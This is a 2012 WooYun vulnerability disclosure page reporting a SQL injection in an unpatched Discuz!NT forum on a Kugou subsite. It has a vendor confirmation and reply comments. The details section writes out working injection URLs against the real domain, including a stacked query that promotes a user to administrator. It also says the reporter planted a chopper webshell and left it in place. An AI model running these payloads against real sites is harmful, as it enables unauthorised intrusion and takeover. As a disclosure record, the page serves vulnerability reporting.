当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05525

漏洞标题:酷狗某站SQL注射漏洞

相关厂商:酷狗

漏洞作者: Jannock

提交时间:2012-03-24 17:35

修复时间:2012-05-08 17:36

公开时间:2012-05-08 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-24: 细节已通知厂商并且等待厂商处理中
2012-03-26: 厂商已经确认,细节仅向厂商公开
2012-04-05: 细节向核心白帽子及相关领域专家公开
2012-04-15: 细节向普通白帽子公开
2012-04-25: 细节向实习白帽子公开
2012-05-08: 细节向公众公开

简要描述:

酷狗某站SQL注射漏洞。。。

详细说明:

嘻嘻。。。我也是来求公仔的。。
今天看到: WooYun: 酷狗某分站后台弱口令
于是也特意看了一下酷狗的网站,google了一下,发现了论坛居然是dnt,还是旧的版本,最重要的是,没打补丁。。。
相关说明:
http://nt.discuz.net/showtopic-135589.html
http://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1') or 1=1--
http://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1') or 1=2--
提升为管理员
http://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1');update kg_users set groupid=1 where username='aaaaaaabc2010'--
进入后台,拿shell
http://xyj.kugou.com/bbs/tools/1.aspx
chopper
shell 还没删除,你们来删吧。。。也是到拿shell为止,什么也没做。

漏洞证明:




修复方案:

应该懂得!

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-03-26 10:10

厂商回复:

已经处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-03-24 22:28 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @Jannock 你这是肿么了...打算和我一起搞酷狗么.

  2. 2012-03-25 09:44 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @only_guest 嘻嘻...

  3. 2012-03-25 10:58 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @Jannock 嘿嘿...相约一起搞乌云吧...